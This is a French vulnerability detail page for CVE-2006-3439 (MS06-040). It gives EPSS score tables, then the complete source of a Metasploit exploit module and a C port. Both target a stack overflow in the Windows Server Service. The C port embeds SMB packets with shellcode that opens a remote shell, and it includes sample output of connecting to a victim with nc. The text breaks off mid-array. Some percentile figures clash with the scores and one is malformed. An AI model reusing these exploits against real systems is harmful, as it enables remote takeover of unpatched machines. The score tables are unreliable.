CVE-2006-3439 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	87.31%	–	–
2023-03-12	–	–	–	97.01%	–
2023-05-07	–	–	–	96.89%	–
2023-06-18	–	–	–	96.96%	–
2023-07-23	–	–	–	96.9%	–
2024-01-07	–	–	–	96.55%	–
2024-06-02	–	–	–	96.55%	–
2024-12-08	–	–	–	96.49%	–
2024-12-22	–	–	–	96.33%	–
2025-01-19	–	–	–	96.33%	–
2025-03-18	–	–	–	–	88.78%
2025-03-30	–	–	–	–	87.5%
2025-03-30	–	–	–	–	87.5,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-05-07	1%
2023-06-18	1%
2023-07-23	1%
2024-01-07	1%
2024-06-02	1%
2024-12-08	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	1%
2025-03-30	99%
2025-03-30	99%

## # $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11762 $', 'References' => [ [ 'CVE', '2006-3439' ], [ 'OSVDB', '27845' ], [ 'BID', '19409' ], [ 'MSB', 'MS06-040' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { # Technically we can use more space than this, but by limiting it # to 370 bytes we can use the same request for all Windows SPs. 'Space' => 370, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'DefaultTarget' => 0, 'Targets' => [ [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', { 'Offset' => 1000, 'Ret' => 0x00020804 } ], [ '(wcscpy) Windows XP SP0/SP1', { 'Offset' => 612, 'Ret' => 0x00020804 } ], [ '(stack) Windows XP SP1 English', { 'OffsetA' => 656, 'OffsetB' => 680, 'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll } ], [ '(stack) Windows XP SP1 Italian', { 'OffsetA' => 656, 'OffsetB' => 680, 'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll } ], [ '(wcscpy) Windows 2003 SP0', { 'Offset' => 612, 'Ret' => 0x00020804 } ], ], 'DisclosureDate' => 'Aug 8 2006')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']), ], self.class) end def exploit connect() smb_login() mytarget = target if (not target) or (target.name =~ /Automatic/) case smb_peer_os() when 'Windows 5.0' print_status("Detected a Windows 2000 target") mytarget = targets[1] when 'Windows NT 4.0' print_status("Detected a Windows NT 4.0 target") mytarget = targets[1] when 'Windows 5.1' begin smb_create("\\SRVSVC") print_status("Detected a Windows XP SP0/SP1 target") rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e if (e.error_code == 0xc0000022) print_status("Windows XP SP2 is not exploitable") return end print_status("Detected a Windows XP target (unknown patch level)") end mytarget = targets[2] when /Windows Server 2003 (\d+)$/ print_status("Detected a Windows 2003 SP0 target") mytarget = targets[5] when /Windows Server 2003 (\d+) Service Pack (\d+)/ print_status("Windows 2003 SP#{$2} is not exploitable") return when /Samba/ print_status("Samba is not vulnerable") return else print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...") return end end # Specific fixups for Windows NT case smb_peer_os() when 'Windows NT 4.0' print_status("Adjusting the SMB/DCERPC parameters for Windows NT") datastore['SMB::pipe_write_min_size'] = 2048 datastore['SMB::pipe_write_max_size'] = 4096 end handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # # /* Function 0x1f at 0x767e912c */ # long function_1f ( # [in] [unique] [string] wchar_t * arg_00, # [in] [string] wchar_t * arg_01, # [out] [size_is(arg_03)] char * arg_02, # [in] [range(0, 64000)] long arg_03, # [in] [string] wchar_t * arg_04, # [in,out] long * arg_05, # [in] long arg_06 # ); # print_status("Building the stub data...") stub = '' case mytarget.name # This covers NT 4.0 as well when /wcscpy.*Windows 2000/ code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded path = code + ( [mytarget.ret].pack('V') * 16 ) + "\x00\x00" stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.long(rand(250)+1) + NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") + NDR.long(rand(250)+1) + NDR.long(0) when /wcscpy.*Windows XP/ path = # Payload goes first payload.encoded + # Padding rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) + # Land 6 bytes in to bypass garbage (XP SP0) [ mytarget.ret + 6 ].pack('V') + # Padding rand_text_alphanumeric(8) + # Address to write our shellcode (XP SP0) [ mytarget.ret ].pack('V') + # Padding rand_text_alphanumeric(32) + # Jump straight to shellcode (XP SP1) [ mytarget.ret ].pack('V') + # Padding rand_text_alphanumeric(8) + # Address to write our shellcode (XP SP1) [ mytarget.ret ].pack('V') + # Padding rand_text_alphanumeric(32) + # Terminate the path "\x00\x00" stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.long(rand(0xf0)+1) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xf0)+1) + NDR.long(0) when /stack/ buff = rand_text_alphanumeric(800) buff[0, payload.encoded.length] = payload.encoded buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V') buff[ mytarget['OffsetB'], 5 ] = "\xe9" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V') path = "\\\x00\\\x00" + buff + "\x00\x00" stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.long(rand(0xf0)+1) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xf0)+1) + NDR.long(0) when /wcscpy.*Windows 2003/ path = # Payload goes first payload.encoded + # Padding rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) + # Padding rand_text_alphanumeric(32) + # The cookie is constant, # noticed by Nicolas Pouvesle in Misc #28 "\x4e\xe6\x40\xbb" + # Padding rand_text_alphanumeric(4) + # Jump straight to shellcode [ mytarget.ret ].pack('V') + # Padding rand_text_alphanumeric(8) + # Address to write our shellcode [ mytarget.ret ].pack('V') + # Padding rand_text_alphanumeric(40) + # Terminate the path "\x00\x00" stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.long(rand(0xf0)+1) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xf0)+1) + NDR.long(0) end print_status("Calling the vulnerable function...") begin dcerpc.call(0x1f, stub, false) dcerpc.call(0x1f, stub, false) rescue Rex::Proto::DCERPC::Exceptions::NoResponse rescue => e if e.to_s !~ /STATUS_PIPE_DISCONNECTED/ raise e end end # Cleanup handler disconnect end end

/* Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040 More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx Written by Preddy This is another version of hdm's metasploit version but ported to C, Works against Windows XP SP1 And it should give a crash on Win2k in services.exe On successfull exploitation it provides a remote shell at port 54321 of your victim: ./ms06 192.168.1.103 Target: 192.168.1.103 Attack Finished: now open a new terminal and nc to your victim on port 54321 Warning: Don't close this window! [open a new terminal/window/prompt] nc 192.168.1.103 54321 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> http://www.team-rootshell.com Greetz to all of my friends at: FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor MILW0RM(ABS.lcirc.net): #milw0rm STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal) PTP(irc.eu.pulltheplug.org): #aso,#Social GSO(gso.eclipticx.net): #gso-chat TTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php SSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan Rootshell Security Group and everyone else ^^ */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <fcntl.h> #include <signal.h> #include <errno.h> #include <unistd.h> #include <stdarg.h> #include <sys/mman.h> #define PORT 139 char peer0_0[] = { 0x81, 0x00, 0x00, 0x44, 0x20, 0x43, 0x4b, 0x46, 0x44, 0x45, 0x4e, 0x45, 0x43, 0x46, 0x44, 0x45, 0x46, 0x46, 0x43, 0x46, 0x47, 0x45, 0x46, 0x46, 0x43, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x00, 0x20, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00 }; char peer0_1[] = { 0x00, 0x00, 0x00, 0x54, 0xff, 0x53, 0x4d, 0x42, 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 0x00, 0x00, 0x84, 0xec, 0x00, 0x31, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 }; char peer0_2[] = { 0x00, 0x00, 0x00, 0xb5, 0xff, 0x53, 0x4d, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 0x00, 0x00, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, 0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0xd0, 0x00, 0x80, 0x7a, 0x00, 0x60, 0x55, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02, 0xa0, 0x4b, 0x30, 0x49, 0xa0, 0x0e, 0x30, 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x37, 0x04, 0x35, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x02, 0x08, 0x00, 0x09, 0x00, 0x09, 0x00, 0x20, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x0c, 0x00, 0x29, 0x00, 0x00, 0x00, 0x57, 0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, 0x55, 0x50, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x54, 0x41, 0x54, 0x49, 0x4f, 0x4e, 0x31, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 0x00 }; char peer0_3[] = { 0x00, 0x00, 0x01, 0x04, 0xff, 0x53, 0x4d, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, 0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0xd0, 0x00, 0x80, 0xc9, 0x00, 0xa1, 0x81, 0xa3, 0x30, 0x81, 0xa0, 0xa2, 0x81, 0x9d, 0x04, 0x81, 0x9a, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00, 0x40, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00, 0x58, 0x00, 0x00, 0x00, 0x12, 0x00, 0x12, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x82, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x08, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x25, 0xa6, 0x9f, 0x80, 0x96, 0x31, 0x6c, 0xca, 0xa0, 0x08, 0x9f, 0x12, 0x7e, 0x47, 0xcd, 0x45, 0x10, 0x25, 0x39, 0x7d, 0xf8, 0x55, 0x66, 0x03, 0x57, 0x00, 0x4f, 0x00, 0x52, 0x00, 0x4b, 0x00, 0x47, 0x00, 0x52, 0x00, 0x4f, 0x00, 0x55, 0x00, 0x50, 0x00, 0x57, 0x00, 0x4f, 0x00, 0x52, 0x00, 0x4b, 0x00, 0x53, 0x00, 0x54, 0x00, 0x41, 0x00, 0x54, 0x00, 0x49, 0x00, 0x4f, 0x00, 0x4e, 0x00, 0x31, 0x00, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 0x00 }; char peer0_4[] = { 0x00, 0x00, 0x00, 0x3a, 0xff, 0x53, 0x4d, 0x42, 0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x04, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0f, 0x00, 0x00, 0x5c, 0x5c, 0x5c, 0x49, 0x50, 0x43, 0x24, 0x00, 0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 }; char peer0_5[] = { 0x00, 0x00, 0x00, 0x5c, 0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x18, 0xff, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x5c, 0x42, 0x52, 0x4f, 0x57, 0x53, 0x45, 0x52, 0x00 }; char peer0_6[] = { 0x00, 0x00, 0x00, 0x92, 0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x48, 0x00, 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, 0x00, 0x40, 0x4f, 0x00, 0x5c, 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 }; char peer0_7[] = { 0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, 0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, 0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, 0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, 0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, 0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, 0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, 0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, 0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, 0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, 0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, 0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, 0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, 0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, 0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, 0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, 0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, 0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, 0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, 0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, 0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, 0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, 0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, 0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, 0x7c, 0x45, 0x8e }; char peer0_8[] = { 0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, 0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, 0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, 0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, 0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, 0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, 0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, 0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, 0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, 0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, 0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, 0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, 0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, 0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, 0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, 0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, 0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, 0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, 0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, 0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, 0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, 0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, 0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, 0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, 0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, 0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, 0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, 0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, 0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, 0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, 0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, 0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, 0x52, 0x66, 0x79 }; char peer0_9[] = { 0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, 0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, 0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, 0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, 0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, 0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, 0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, 0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, 0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, 0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, 0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, 0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, 0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, 0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, 0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, 0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, 0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, 0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, 0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, 0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, 0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, 0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, 0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 